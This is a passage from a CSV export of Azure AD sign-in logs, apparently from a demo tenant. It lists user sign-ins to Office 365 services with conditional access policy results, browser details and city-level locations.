'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",69bf3c7f-96b8-4aae-959c-a7bbc9650d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,69bf3c7f-96b8-4aae-959c-a7bbc9650d00,SigninLogs,Sucess,41.90428925,-85.99833679
+1149,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:48.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b9401a5-37cb-4c29-8caa-f2cdc63a83d4,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",706e1892-a48a-4a34-be7e-8777b5da1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,706e1892-a48a-4a34-be7e-8777b5da1500,SigninLogs,Sucess,33.7984581,-84.38828278
+1150,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:09.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0bce469f-e02f-0000-54e6-7d031fbb3810,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d3a3c86e-d6a1-4323-9bc0-1a26533b1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d3a3c86e-d6a1-4323-9bc0-1a26533b1500,SigninLogs,Sucess,41.90428925,-85.99833679
+1151,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:18.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,133deccc-7541-4eda-8abe-ed03d6472e6e,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d3a3c86e-d6a1-4323-9bc0-1a260d3d1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,d3a3c86e-d6a1-4323-9bc0-1a260d3d1500,SigninLogs,Sucess,41.90428925,-85.99833679
+1152,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:28.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,8ccd469f-7038-0000-5421-79fcb5769fe0,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,[],notApplied,08/04/2020 16:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",48cf7de2-e659-4e20-aee0-25dce8231500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,48cf7de2-e659-4e20-aee0-25dce8231500,SigninLogs,Failed,41.90428925,-85.99833679
+1153,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:06.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2d002445-8f1f-4e60-ad49-0ed804342a5c,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",706e1892-a48a-4a34-be7e-8777cdd51500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,706e1892-a48a-4a34-be7e-8777cdd51500,SigninLogs,Sucess,33.7984581,-84.38828278
+1154,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:56.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a8c6c030-578d-4e20-9e3e-99cfcdefc588,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 16:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",f81997e3-0b26-42cc-8532-c4de801d1600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f81997e3-0b26-42cc-8532-c4de801d1600,SigninLogs,Sucess,33.7984581,-84.38828278
+1155,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,43:59.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,a2cd469f-d04f-0000-5421-7b98b2db0309,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,[],notApplied,08/04/2020 16:43,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",4445394f-bc55-4988-8502-680d1f171600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,4445394f-bc55-4988-8502-680d1f171600,SigninLogs,Failed,41.90428925,-85.99833679
+1156,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:58.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,75241cf9-4f82-4e9e-841a-98c7ce024402,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",87802367-3de7-42c2-ada0-d6bcc3951400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,87802367-3de7-42c2-ada0-d6bcc3951400,SigninLogs,Sucess,33.7984581,-84.38828278
+1157,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:12.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8bf8492f-4c21-4d3b-bf82-8bafcda86d4a,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",09a9b111-0bef-49d6-ac1b-dbcd5b241800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,09a9b111-0bef-49d6-ac1b-dbcd5b241800,SigninLogs,Sucess,33.7984581,-84.38828278
+1158,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:13.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9d1a7243-d778-454a-8742-4fe0745cc077,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 